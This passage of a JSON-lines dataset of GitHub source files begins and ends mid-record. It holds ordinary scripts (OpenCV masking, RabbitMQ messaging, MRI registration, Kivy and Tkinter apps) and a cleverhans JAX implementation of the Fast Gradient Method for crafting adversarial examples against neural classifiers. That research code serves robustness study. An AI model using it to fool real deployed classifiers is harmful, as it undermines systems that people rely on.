f\"Ulam_approximation_methodUlam_mapanormal_Sij_eigenvals_N{Ns[ni]}_ruido_abs0.00390625_grilla1N_K13_Nc1000.npz\"\n \n# # Renaming the file\n# os.rename(old_name, new_name)","repo_name":"tnotenson/quantum-chaos","sub_path":"Ulam_tofu.py","file_name":"Ulam_tofu.py","file_ext":"py","file_size_in_byte":15702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"519849707","text":"import numpy as np\nimport cv2 as cv\n\ncap = cv.VideoCapture (0)\n\nwhile True:\n _, frame = cap.read ()\n\n hsv = cv.cvtColor (frame, cv.COLOR_BGR2HSV)\n\n lower_green = np.array ([40, 100, 0])\n upper_green = np.array ([80, 255, 255])\n\n mask = cv.inRange (hsv, lower_green, upper_green)\n\n res = cv.bitwise_and (frame, frame, mask=mask)\n\n cv.imshow(\"Original\", frame)\n cv.imshow(\"white\", mask)\n cv.imshow(\"green\", res)\n\n k = cv.waitKey(5) & 0xFF\n if k == 27:\n break\n\ncv.destroyAllWindows()\n","repo_name":"BinaryFuck/opencv","sub_path":"green.py","file_name":"green.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41324198867","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @author: similraface\n# @contact: similarface@gmail.com\n# @software: PyCharm\n# @file: sender.py\n# @time: 2022/6/12 7:18 下午\n# @desc:\n\n\"\"\"\nProducer ---> exchange.normal+fanout---> quenue.normal\n \\_dlx__> exchange.dlx+direct--->quene.dlx\n\"\"\"\nimport json\nimport time\n\nimport pika\n\nfrom main import Sender\n\nif __name__ == '__main__':\n sender = Sender(url=\"amqp://guest:guest@localhost:5672\")\n\n # 正常交换机\n exchange_normal = \"exchange_normal\"\n # 正常队列\n quenue_normal = \"quenue_normal\"\n # 正常路由\n routing_key = \"routing_normal\"\n\n # 死信交换机\n exchange_dlx = \"exchange.dlx\"\n # 死信队列\n quenue_dlx = \"dead_letter_queue\"\n dead_letter_routing_key = \"dead_letter_routing_key_a\"\n\n arguments = {\n \"x-message-ttl\": 5000,\n \"x-dead-letter-exchange\": exchange_dlx,\n \"x-dead-letter-routing-key\": dead_letter_routing_key\n }\n\n sender.channel.confirm_delivery()\n\n sender.channel.exchange_declare(exchange=exchange_normal, durable=True, exchange_type=\"direct\")\n result = sender.channel.queue_declare(queue=quenue_normal, durable=False, arguments=arguments)\n sender.channel.queue_bind(exchange=exchange_normal, queue=quenue_normal, routing_key=routing_key)\n\n for i in range(10):\n message = json.dumps({\"OrderId\": i})\n sender.channel.basic_publish(exchange=exchange_normal,\n routing_key=routing_key,\n body=message,\n properties=pika.BasicProperties(delivery_mode=2)\n )\n print(message)\n time.sleep(1.5)\n sender.close()\n","repo_name":"similarface/rabbitmqdocs","sub_path":"dlxs/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"4500686495","text":"from Parser.GrammarParser import *\nfrom CodeGenerator.Generator import *\nfrom Semantic_Analyzer.SemanticAnalyzer import *\n\nlexicalAnalyzer = LexicalAnalyzer('test.cpp')\nlexicalAnalyzerResult = lexicalAnalyzer.startParsing()\n\nprint()\nif lexicalAnalyzerResult:\n\n grammarParser = GrammarParser()\n grammarParser.parseJsonRules('grammar.json')\n\n earley = Earley(grammarParser.rules, \"<программа>\")\n\n earleyParseResult = earley.parse(lexicalAnalyzer.lexemeArray)\n earley.printTableToFile()\n earley.printError()\n earleyTable = earley.table\n\n if earleyParseResult:\n treeBuilder = TreeBuilder(earleyTable, grammarParser.rules)\n treeBuilder.buildTree()\n treeBuilder.printTreeToFile()\n\n generator = Generator(treeBuilder.tree)\n generator.generate()\n print(generator.resultCode)\n\n variableStorage = VariableStorage()\n semanticAnalyser = VariableSemanticAnalyser(treeBuilder.tree)\n semanticAnalyser.parse(treeBuilder.tree, variableStorage)\n\n print()\n","repo_name":"drainkid/cpppascaltranslator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"25039780747","text":"import sys\n# setting path\nsys.path.append('../TM2_segmentation')\n\nimport os\nimport numpy as np\nimport nibabel as nib\nimport itk\nimport pandas as pd\nimport tarfile\n\nfrom scripts.preprocess_utils import find_file_in_path, register_to_template\n\n# load metadata file \n\ninput_annotation_file = 'data/csv_files/PediatricMRI_DEMOGRAPHICS.csv' \ndf = pd.read_csv(input_annotation_file, header=0)\ninput_path = \"data/nimh_peds_mri_lr02/\"\nsave_to = 'data/t1_mris/nihm_reg/'\n\nage_ranges = {\"data/golden_image/mni_templates/nihpd_asym_04.5-08.5_t1w.nii\" : {\"min_age\":3, \"max_age\":7},\n \"data/golden_image/mni_templates/nihpd_asym_07.5-13.5_t1w.nii\": {\"min_age\":8, \"max_age\":13},\n \"data/golden_image/mni_templates/nihpd_asym_13.0-18.5_t1w.nii\": {\"min_age\":14, \"max_age\":35}}\n\nfinal_metadata = []\n#print(df)\nfor idx in range(0, df.shape[0]):\n row = df.iloc[idx]\n age = row['AGE_MONTHS_DOV_TO_DOB'] \n sex = row['SUBJECT_GENDER']\n if 'Female' in sex:\n sex = 2\n else:\n sex = 1\n print(age, sex)\n for filepath in os.listdir(input_path):\n if str(row['SRC_SUBJECT_ID']) in filepath and row['TIMEPOINT_LABEL'].lower() in filepath :\n for golden_file_path, age_values in age_ranges.items():\n if age_values['min_age'] <= age//12 and age//12 <= age_values['max_age']: \n print(age, input_path+filepath, save_to, golden_file_path)\n register_to_template(input_path+filepath, save_to, golden_file_path, create_subfolder=False)\n #0,AGE_M,SEX,SCAN_PATH,Filename,dataset\n final_metadata.append([age,sex,save_to+filepath,filepath,'HIMH'])\n break\ndf = pd.DataFrame(final_metadata)\ndf.to_csv(path_or_buf= \"data/Dataset_nihm.csv\")\n\n","repo_name":"AIM-KannLab/itmt","sub_path":"data_curation_scripts/curate_nimh.py","file_name":"curate_nimh.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"27763970649","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nACTIVE_CERT_LABEL = 'Current'\nNEXT_CERT_LABEL = 'Next'\nPREVIOUS_CERT_LABEL = 'Previous'\n\n\ndef ListServerCas(sql_client, sql_messages, instance_ref):\n \"\"\"Calls the list server CAs endpoint and returns the response.\"\"\"\n return sql_client.instances.ListServerCas(\n sql_messages.SqlInstancesListServerCasRequest(\n project=instance_ref.project, instance=instance_ref.instance))\n\n\ndef GetServerCaTypeDict(list_server_cas_response):\n \"\"\"Gets a dictionary mapping Server CA Cert types to certs.\n\n The keys to the dictionary returned will be some combinatiaon of 'Current',\n 'Next', and 'Previous'.\n\n Args:\n list_server_cas_response: InstancesListServerCasResponse instance.\n\n Returns:\n A dictionary mapping Server CA Cert types to SslCert instances.\n \"\"\"\n server_ca_types = {}\n\n active_id = list_server_cas_response.activeVersion\n\n # Get the active cert.\n certs = list_server_cas_response.certs\n active_cert = None\n for cert in certs:\n if cert.sha1Fingerprint == active_id:\n active_cert = cert\n break\n if not active_cert:\n # No server CA types can be discerned; return an empty dict.\n return server_ca_types\n server_ca_types[ACTIVE_CERT_LABEL] = active_cert\n\n # Get the inactive certs.\n inactive_certs = [cert for cert in certs if cert.sha1Fingerprint != active_id]\n if len(inactive_certs) == 1:\n inactive_cert = inactive_certs[0]\n if inactive_cert.createTime > active_cert.createTime:\n # Found the next cert.\n server_ca_types[NEXT_CERT_LABEL] = inactive_cert\n else:\n # Found the previous cert.\n server_ca_types[PREVIOUS_CERT_LABEL] = inactive_cert\n elif len(inactive_certs) > 1:\n # Sort by expiration date.\n inactive_certs = sorted(inactive_certs, key=lambda cert: cert.createTime)\n server_ca_types[PREVIOUS_CERT_LABEL] = inactive_certs[0]\n server_ca_types[NEXT_CERT_LABEL] = inactive_certs[-1]\n\n return server_ca_types\n\n\ndef GetCurrentServerCa(sql_client, sql_messages, instance_ref):\n \"\"\"Returns the currently active Server CA Cert.\"\"\"\n server_ca_types = GetServerCaTypeDict(\n ListServerCas(sql_client, sql_messages, instance_ref))\n return server_ca_types.get(ACTIVE_CERT_LABEL)\n\n\ndef GetNextServerCa(sql_client, sql_messages, instance_ref):\n \"\"\"Returns the upcoming Server CA Cert.\"\"\"\n server_ca_types = GetServerCaTypeDict(\n ListServerCas(sql_client, sql_messages, instance_ref))\n return server_ca_types.get(NEXT_CERT_LABEL)\n\n\ndef GetPreviousServerCa(sql_client, sql_messages, instance_ref):\n \"\"\"Returns the previously active Server CA Cert.\"\"\"\n server_ca_types = GetServerCaTypeDict(\n ListServerCas(sql_client, sql_messages, instance_ref))\n return server_ca_types.get(PREVIOUS_CERT_LABEL)\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/api_lib/sql/ssl/server_ca_certs.py","file_name":"server_ca_certs.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"20247354752","text":"from setuptools import setup\n\nwith open ('README.rst') as f:\n long_description = f.read()\n\nsetup(\n name='wslexplorer',\n version='0.1.2',\n description='Simple script that launches Window Explorer from Windows Subsystem for Linux',\n long_description=long_description,\n url='https://github.com/scottfp/wslexplorer',\n author='Scott Pritchard',\n author_email='scottfp@gmail.com',\n license='MIT',\n py_modules=['wslexplorer.win_explorer',\n 'wslexplorer.config'],\n install_requires=[\n 'Click',\n 'ruamel.yaml'\n ],\n entry_points='''\n [console_scripts]\n wslexplorer=wslexplorer.win_explorer:launch\n '''\n)\n","repo_name":"scottfp/wslexplorer","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"32225515873","text":"\"\"\"\r\nhttp://www.django-rest-framework.org/api-guide/serializers/\r\n\r\n\"\"\"\r\n\r\nfrom rest_framework import serializers\r\n\r\nfrom ...models import RapidTitle\r\n\r\n\r\nclass RapidTitleSerializer(serializers.HyperlinkedModelSerializer):\r\n tconst = serializers.HyperlinkedRelatedField(\r\n many=False,\r\n read_only=True,\r\n view_name='title-detail',\r\n lookup_field='tconst'\r\n )\r\n\r\n class Meta:\r\n model = RapidTitle\r\n fields = [\r\n 'id',\r\n 'created',\r\n 'updated',\r\n 'tconst',\r\n 'title',\r\n 'titleType',\r\n 'image_url',\r\n 'remote_id',\r\n ]\r\n","repo_name":"AmalgamProjects/flixfinder-backend","sub_path":"src/ff_api/serializers/full/rapid.py","file_name":"rapid.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72232543904","text":"import jax.numpy as np\nfrom jax import grad, vmap\nfrom jax.nn import log_softmax as logsoftmax\n\nfrom cleverhans.jax.utils import one_hot\n\n\ndef fast_gradient_method(\n model_fn, x, eps, norm, clip_min=None, clip_max=None, y=None, targeted=False\n):\n \"\"\"\n JAX implementation of the Fast Gradient Method.\n :param model_fn: a callable that takes an input tensor and returns the model logits.\n :param x: input tensor.\n :param eps: epsilon (input variation parameter); see https://arxiv.org/abs/1412.6572.\n :param norm: Order of the norm (mimics NumPy). Possible values: np.inf or 2.\n :param clip_min: (optional) float. Minimum float value for adversarial example components.\n :param clip_max: (optional) float. Maximum float value for adversarial example components.\n :param y: (optional) Tensor with one-hot true labels. If targeted is true, then provide the\n target one-hot label. Otherwise, only provide this parameter if you'd like to use true\n labels when crafting adversarial samples. Otherwise, model predictions are used\n as labels to avoid the \"label leaking\" effect (explained in this paper:\n https://arxiv.org/abs/1611.01236). Default is None. This argument does not have\n to be a binary one-hot label (e.g., [0, 1, 0, 0]), it can be floating points values\n that sum up to 1 (e.g., [0.05, 0.85, 0.05, 0.05]).\n :param targeted: (optional) bool. Is the attack targeted or untargeted?\n Untargeted, the default, will try to make the label incorrect.\n Targeted will instead try to move in the direction of being more like y.\n :return: a tensor for the adversarial example\n \"\"\"\n if norm not in [np.inf, 2]:\n raise ValueError(\"Norm order must be either np.inf or 2.\")\n\n if y is None:\n # Using model predictions as ground truth to avoid label leaking\n x_labels = np.argmax(model_fn(x), 1)\n y = one_hot(x_labels, 10)\n\n def loss_adv(image, label):\n pred = model_fn(image[None])\n loss = -np.sum(logsoftmax(pred) * label)\n if targeted:\n loss = -loss\n return loss\n\n grads_fn = vmap(grad(loss_adv), in_axes=(0, 0), out_axes=0)\n grads = grads_fn(x, y)\n\n axis = list(range(1, len(grads.shape)))\n avoid_zero_div = 1e-12\n if norm == np.inf:\n perturbation = eps * np.sign(grads)\n elif norm == 1:\n raise NotImplementedError(\"L_1 norm has not been implemented yet.\")\n elif norm == 2:\n square = np.maximum(\n avoid_zero_div, np.sum(np.square(grads), axis=axis, keepdims=True)\n )\n perturbation = grads / np.sqrt(square)\n\n adv_x = x + perturbation\n\n # If clipping is needed, reset all values outside of [clip_min, clip_max]\n if (clip_min is not None) or (clip_max is not None):\n # We don't currently support one-sided clipping\n assert clip_min is not None and clip_max is not None\n adv_x = np.clip(adv_x, a_min=clip_min, a_max=clip_max)\n\n return adv_x\n","repo_name":"cleverhans-lab/cleverhans","sub_path":"cleverhans/jax/attacks/fast_gradient_method.py","file_name":"fast_gradient_method.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":5963,"dataset":"github-code","pt":"7"} +{"seq_id":"71451314463","text":"import math\nimport pydaq\nimport logging\nimport argparse\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef _init_logger(level, logfile=None):\n log_handlers = [logging.StreamHandler()]\n if logfile is not None:\n file_format = logging.Formatter('[ %(asctime)s | %(levelname)-8s] %(message)s')\n file_handler = logging.FileHandler(logfile)\n file_handler.setFormatter(file_format)\n log_handlers.append(file_handler)\n log_level = getattr(logging, level.upper(), logging.INFO)\n logging.basicConfig(format='%(message)s', level=log_level, handlers=log_handlers)\n\n\ndef _parse_duration(duration):\n nsec, sec = math.modf(duration)\n return [int(sec), int(nsec*1e9)]\n\n\ndef main(host, platform, nruns, duration, ncalib):\n logger.info('Running with configuration: nruns %d, duration %.1f s, ncalib %d', nruns, duration, ncalib)\n logger.info('Connecting to daq control running on %s with platform %d', host, platform)\n try:\n daq = pydaq.Control(host, platform)\n for n in range(nruns):\n logger.info(\"Started run %d\", n)\n logger.debug(\"Calling daq configure with events=0\")\n daq.configure(events=0)\n for c in range(ncalib):\n logger.info(\"Started calibcycle %d\", c)\n duration_s, duration_ns = _parse_duration(duration)\n logger.debug(\"Calling daq begin with duration=[%d,%d]\", duration_s, duration_ns)\n daq.begin(duration=[duration_s, duration_ns])\n logger.debug(\"Waiting for daq to finish running\")\n daq.wait()\n logger.info(\"Ended calibcycle %d\", c)\n logger.debug(\"Calling daq endrun\")\n daq.endrun()\n logger.info(\"Ended run %d\", n) \n finally:\n logger.info('Disconnecting from the daq')\n daq.disconnect()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Simple script for exercising the daq\")\n\n parser.add_argument(\n \"-a\",\n \"--address\",\n dest=\"host\",\n default='localhost',\n help=\"connect to DAQ at HOST\"\n )\n\n parser.add_argument(\n \"-p\",\n \"--platform\",\n dest=\"platform\",\n type=int,\n default=0,\n help=\"connect to DAQ at PLATFORM\"\n )\n\n parser.add_argument(\n '--log-level',\n default='INFO',\n help='the logging level of the application (default INFO)'\n )\n\n parser.add_argument(\n '--log-file',\n help='an optional file to write the log output to'\n )\n\n parser.add_argument(\n 'nruns',\n type=int,\n metavar=\"NRUNS\",\n help=\"the number of runs\"\n )\n\n parser.add_argument(\n 'duration',\n type=float,\n metavar=\"DURATION\",\n default=30.0,\n nargs='?',\n help=\"the duration (in secs) of each calib cycle (default: 30 s)\"\n )\n\n parser.add_argument(\n 'ncalib',\n type=int,\n metavar=\"NCALIB\",\n default=1,\n nargs='?',\n help=\"the number of calib cycles to use (default: 1)\"\n )\n\n args = parser.parse_args()\n\n # set up the logger\n _init_logger(args.log_level, args.log_file)\n\n try:\n main(args.host, args.platform, args.nruns, args.duration, args.ncalib)\n except KeyboardInterrupt:\n pass\n","repo_name":"lcls-daq/tools","sub_path":"scanning/fitness_test.py","file_name":"fitness_test.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74617555424","text":"from kivy.app import App\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.label import Label\nfrom kivy.uix.image import Image\nfrom kivy.uix.behaviors import ButtonBehavior\nfrom kivy.properties import ObjectProperty\nfrom kivy.storage.jsonstore import JsonStore\nfrom kivy.core.window import Window\n\nfrom kivymd.theming import ThemeManager\nfrom kivymd.label import MDLabel\n\nimport datetime\nimport locale\n\n#Window.size = (480, 853)\n\nfrom kivy.config import Config\nConfig.set('kivy', 'keyboard_mode', 'systemanddock')\n\nclass ItemLabel(Label):\n pass\n \nclass ClickableImage(Image, ButtonBehavior):\n pass\n \n \n\nclass Container(BoxLayout):\n \n stored_data = ObjectProperty(None)\n\n def __init__(self, *args, **kwargs):\n super(BoxLayout, self).__init__(*args, **kwargs)\n self.stored_data = JsonStore('data.json')\n for item_key in self.stored_data.keys():\n item = self.stored_data.get(item_key)\n self.addtodoClick(item['text'], item['done'])\n \n\n def addtodoClick(self, text, done=0):\n lab = ItemLabel(text=\"[ref=l]{}[/ref]\".format(text))\n if done:\n lab.text = \"[s]{}[/s]\".format(lab.text)\n lab.color = (0.5, 0.5, 0.5, 1)\n lab.font_size = '40sp'\n \n lab.bind(on_ref_press=self.LabelClickHandler)\n lab.children[0].bind(on_touch_down=self.delClick)\n \n self.ids['todolist'].add_widget(lab)\n \n \n def delClick (self, image, touch):\n if image.collide_point(*touch.pos):\n #print(image.size)\n image.parent.parent.remove_widget(image.parent)\n \n\n def LabelClickHandler(self, *args):\n lab = args[0]\n text = lab.text\n if text.find('[s]')>=0:\n text = text.replace('[s]', '').replace('[/s]', '')\n lab.color = (1, 1, 1, 1)\n else:\n text = \"[s]{}[/s]\".format(text)\n lab.color = (0.5, 0.5, 0.5, 1)\n lab.text = text\n \n \n \n def clearTodos(self):\n #print(self.ids['todolist'].children)\n gl = self.ids['todolist']\n #for lab in gl.children:\n while gl.children:\n lab = gl.children[0]\n #print(lab.text)\n gl.remove_widget(lab)\n \n\nclass ToDoApp(App):\n theme_cls = ThemeManager()\n locale.setlocale(locale.LC_TIME, 'ru')\n today = datetime.datetime.today().strftime(\"%A, %d.%m.%Y\").encode('latin-1').decode('cp1251') # Finish\n title = 'Привет. Сегодня ' + today #time.strftime(\"%a %b %d %H:%M:%S %Y\")\n \n def on_close(self, *args):\n key = 0\n self.root.stored_data.clear()\n for lab in self.root.ids['todolist'].children:\n self.root.stored_data.put(key, done=1 if \"[s]\" in lab.text else 0, \\\n text=lab.text.replace(\"[s]\", \"\").replace(\"[/s]\", \"\").replace(\"[ref=l]\", \"\").replace(\"[/ref]\", \"\")) \n key += 1\n\n return True \n\n def build(self):\n Window.bind(on_close=self.on_close)\n self.theme_cls.theme_style = 'Dark'\n c = Container()\n return c \n \n\n\nif __name__ == \"__main__\":\n ToDoApp().run() \n","repo_name":"igorvereshchak/todoapp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"38685365353","text":"import tkinter as tk \nimport tkinter.ttk as ttk\n\nfrom .FileSelecter import FileSelecter\nfrom .ParameterViewA import ParameterViewA\nfrom .ParameterViewB import ParameterViewB\nfrom .Plot import Plot\nfrom .SelectStations import SelectStationsWindow \n\nfrom .InterfaceState import InterfaceState\nfrom ..io import load_src_posn\n\nfrom ..visualisation import plot_residuals\nfrom ..calc import *\n\nclass MainWindow(tk.Tk):\n \"\"\"Main application class for the helmert transfrom interface\"\"\"\n\n file_formats = [\"\"]\n \n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n \n #Misc configuration\n self.title(\"Icrf Tool\")\n design_mode = False \n\n #Data\n self.df_from = None\n self.df_to = None\n self.stations = None\n self.transformed = None \n\n self.state = InterfaceState(self)\n\n #Tkinter widgets\n self.title_label = tk.Label(self, text = \"Icrf Tool\", font=(\"Helvetica\", 16))\n\n self.data_frame = tk.Frame(self)\n self.from_file_selecter_label = ttk.Label(self.data_frame, text=\"Transform from:\")\n self.from_file_selecter = FileSelecter(self.data_frame, self.state.transform.from_file_path, self.state.transform.from_epoch, self.file_formats)\n self.to_file_selecter_label = ttk.Label(self.data_frame, text=\"Transform to:\")\n self.to_file_selecter = FileSelecter(self.data_frame, self.state.transform.to_file_path, self.state.transform.to_epoch, self.file_formats)\n self.select_stations_button = ttk.Button(self.data_frame, text=\"Select stations\", state = \"disable\")\n \n #self.line1 = ttk.Separator(self, orient = \"horizontal\")\n\n #self.config_frame = tk.Frame(self)\n self.weighted_button_label = ttk.Label(self.data_frame, text=\"Weighted\")\n self.weighted_button = ttk.Checkbutton(self.data_frame, variable=self.state.transform.weighted, onvalue=True, offvalue=False)\n \n self.transform_type_combo_label = ttk.Label(self.data_frame, text=\"Transform type\")\n self.transform_type_combo = ttk.Combobox(self.data_frame, textvariable=self.state.transform.type, values = ['A', 'B'], width=3)\n \n self.calculate_button = ttk.Button(self.data_frame, text = \"Calculate parameter\", state = \"disable\")\n self.transform_button = ttk.Button(self.data_frame, text = \"Plot residuals\", state = \"disable\")\n self.reset_button = ttk.Button(self.data_frame, text = \"Reset parameters\")\n \n #self.line2 = ttk.Separator(self, orient = \"horizontal\")\n\n self.parameter_frame = tk.Frame(self)\n self.parameter_view = ParameterViewA(self.parameter_frame)\n \n self.chi2_label = ttk.Label(self.parameter_frame, text = \"Chi squared: \")\n self.chi_2_value = ttk.Label(self.parameter_frame, textvariable = self.state.transform.chi_squared) \n self.wrms_label = ttk.Label(self.parameter_frame, text = \"Weighted root mean squared: \")\n self.wrms_value = ttk.Label(self.parameter_frame, textvariable=self.state.transform.weighted_root_mean_squared)\n\n self.plot_frame = tk.Frame(self)\n self.plot = Plot(self.plot_frame, 1, 1) \n #self.plot.fig.subplots_adjust(left=0.1, right=0.9, bottom=0.1, top=0.9, wspace=0.1, hspace=0.1)\n self.plot.fig.tight_layout(pad=1)\n\n #Place Tkinter widgets\n\n self.rowconfigure(0, weight=0)\n self.rowconfigure(1, weight=0)\n self.rowconfigure(2, weight=1)\n\n self.columnconfigure(0, weight = 0)\n self.columnconfigure(1, weight = 1)\n\n self.title_label.grid(row = 0, column=0, sticky=\"w\", padx=30, pady=20)\n\n self.data_frame.grid(row=1, column=0, padx=30, sticky = \"news\")\n self.from_file_selecter_label.grid(row=0, column=0, sticky=\"nw\")\n self.from_file_selecter.grid(row=1, column=0, sticky=\"ew\", pady=4, columnspan=6)\n self.to_file_selecter_label.grid(row=2, column=0, sticky=\"nw\")\n self.to_file_selecter.grid(row=3, column=0, sticky=\"ew\", pady=4, columnspan=6)\n #self.select_stations_button.grid(row=4, column=0, sticky = \"w\", pady=10)\n\n #self.line1.grid(row=4, column=0, sticky=\"ew\")\n\n #self.config_frame.grid(row=6, column=0, padx=10, pady=10)\n self.weighted_button_label.grid(row=5, column=0)\n self.weighted_button.grid(row=6, column=0)\n\n self.transform_type_combo_label.grid(row=5, column=1)\n self.transform_type_combo.grid(row=6, column=1)\n\n self.calculate_button.grid(row=6, column=2, sticky=\"w\")\n self.transform_button.grid(row=6, column=3, sticky=\"ew\")\n self.reset_button.grid(row=6, column=4, sticky=\"e\")\n\n #self.line2.grid(row=8, column=0, sticky=\"ew\")\n\n self.parameter_frame.grid(row=2, column=0, padx=30, pady=50, sticky=\"news\")\n self.parameter_view.grid(row=0, column=0, columnspan=4, pady=10, sticky=\"ew\")\n #self.chi2_label.grid(row=1, column=0, sticky=\"n\")\n #self.chi_2_value.grid(row=1, column=1, sticky=\"n\")\n #self.wrms_label.grid(row=1, column=2, sticky=\"n\")\n #self.wrms_value.grid(row=1, column=3, sticky=\"n\")\n\n self.plot_frame.grid(row=0, column=1, rowspan=3, sticky=\"news\")\n self.plot.pack(expand=True, fill='both')\n self.update_plot()\n \n #Bind actions\n self.state.transform.from_file_path.trace_add(\"write\", self.df_from_change)\n self.state.transform.to_file_path.trace_add(\"write\", self.df_to_change)\n self.select_stations_button.config(command = self.select_stations)\n\n self.state.transform.type.trace_add(\"write\", self.transformation_type_change)\n\n self.calculate_button.config(command = self.calculate_parameters)\n self.transform_button.config(command = self.update_transform)\n self.reset_button.config(command = self.reset_parameters)\n\n if design_mode:\n self.title_label.config(background=\"red\")\n self.parameter_frame.config(background=\"blue\")\n self.data_frame.config(background=\"red\")\n\n def transformation_type_change(self, *args):\n type = self.state.transform.type.get()\n self.parameter_view.destroy()\n \n if type == \"A\":\n self.parameter_view = ParameterViewA(self.parameter_frame)\n elif type == \"B\":\n self.parameter_view = ParameterViewB(self.parameter_frame)\n \n self.parameter_view.grid(row=0, column=0, columnspan=4, pady=10, sticky=\"ew\")\n\n def select_stations(self, *args):\n \"\"\"Open station selection window\"\"\"\n self.select_stations_window = SelectStationsWindow(self)\n\n def df_from_change(self, *args):\n \"\"\"Called on from_file change.\"\"\"\n if not self.state.transform.from_file_path.get()==\"\":\n self.df_from = load_src_posn(self.state.transform.from_file_path.get())\n self.set_stations()\n\n def df_to_change(self, *args):\n \"\"\"Called on to_file change.\"\"\"\n if not self.state.transform.to_file_path.get()==\"\":\n self.df_to = load_src_posn(self.state.transform.to_file_path.get())\n self.set_stations()\n\n def set_stations(self):\n \"\"\"Updates the station list as the intersection of stations\"\"\"\n self.select_stations_button.config(state = \"normal\")\n self.transform_button.config(state = \"normal\")\n self.calculate_button.config(state = \"normal\")\n # if not self.df_from is None and not self.df_to is None:\n # station_intersection = self.df_from.Station_Name.isin(self.df_to.Station_Name)\n # df_from = self.df_from[station_intersection]\n # df_to = self.df_to[station_intersection]\n\n # sigmas = np.sqrt(df_from.X_sigma**2 + df_from.Y_sigma**2 + df_from.Z_sigma**2 + df_to.X_sigma**2 + df_to.Y_sigma**2 + df_to.Z_sigma**2) \n # stations = df_from.Station_Name\n\n # self.stations = pd.DataFrame({\"Station_Name\" : stations, \"Sigma\" : sigmas, \"Selected\" : True})\n\n def calculate_parameters(self, *args):\n custom_dict = {}\n type = self.state.transform.type.get()\n \n if type == \"A\":\n for name, parameter in self.state.parameters_a.get_parameter_dict().items():\n if parameter.is_custom.get():\n custom_dict[name] = parameter.value.get()\n else:\n custom_dict[name] = None\n elif type == \"B\":\n for name, parameter in self.state.parameters_b.get_parameter_dict().items():\n if parameter.is_custom.get():\n custom_dict[name] = parameter.value.get()\n else:\n custom_dict[name] = None\n\n weighted = self.state.transform.weighted.get()\n\n df_from = self.df_from#[self.stations.Selected]\n df_to = self.df_to#[self.stations.Selected]\n\n value_dict, sigma_dict = calculate_parameters(df_from, df_to, weighted, custom_dict, type)\n\n if type == \"A\": \n for name, value in value_dict.items():\n self.state.parameters_a.values[name].set(value)\n\n for name, value in sigma_dict.items():\n self.state.parameters_a.sigmas[name].set(value)\n elif type==\"B\":\n for name, value in value_dict.items():\n self.state.parameters_b.values[name].set(value)\n\n for name, value in sigma_dict.items():\n self.state.parameters_b.sigmas[name].set(value)\n\n def update_transform(self, *args):\n self.calculate_transform()\n self.update_plot()\n self.update_statistics()\n\n def calculate_transform(self, *args):\n type = self.state.transform.type.get()\n if type == \"A\":\n parameter_dict = {name : var.get() for name, var in self.state.parameters_a.values.items()}\n elif type == \"B\":\n parameter_dict = {name : var.get() for name, var in self.state.parameters_b.values.items()}\n\n\n df_from = self.df_from\n df_to = self.df_to\n \n type = self.state.transform.type.get()\n\n self.transformed = icrf_transform(df_from, parameter_dict, type = type)\n self.transformed = calculate_residuals(self.transformed, df_to)\n\n def update_plot(self, *args):\n self.plot.clear()\n if not self.transformed is None:\n transformed = self.transformed\n else:\n transformed = None\n plot_residuals(transformed, self.plot.axes)\n self.plot.draw()\n\n def update_statistics(self):\n df_from = self.df_from#[self.stations.Selected]\n df_to = self.df_to#[self.stations.Selected]\n \n standared_errors = df_from.X_sigma**2 + df_from.Y_sigma**2 + df_from.Z_sigma**2 + df_to.X_sigma**2 + df_to.Y_sigma**2 + df_to.Z_sigma**2\n value = sum(self.transformed.dX ** 2 / standared_errors)\n \n #self.state.transform.chi_squared.set(self.value_to_string(value))\n #self.state.transform.weighted_root_mean_squared.set(self.value_to_string(value/sum(1/standared_errors)))\n\n def reset_parameters(self, *args):\n \"\"\"Reset all parameter values to zero\"\"\"\n type = self.state.transform.type.get()\n if type == \"A\":\n parameters = self.state.parameters_a.get_parameter_dict().values()\n if type == \"B\":\n parameters = self.state.parameters_b.get_parameter_dict().values()\n \n for parameter in parameters:\n parameter.value.set(0)\n if self.state.transform.weighted:\n parameter.sigma.set(0)\n else:\n #TODO: No value?\n parameter.sigma.set(0) \n \n def value_to_string(self, value):\n string = \"{:.4f}\".format(value)\n return string ","repo_name":"AdrianLundell/adrians-geotools","sub_path":"IcrfTool/interface/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":11745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17378090412","text":"# -*- coding: utf-8 -*-\n\nimport time\nimport 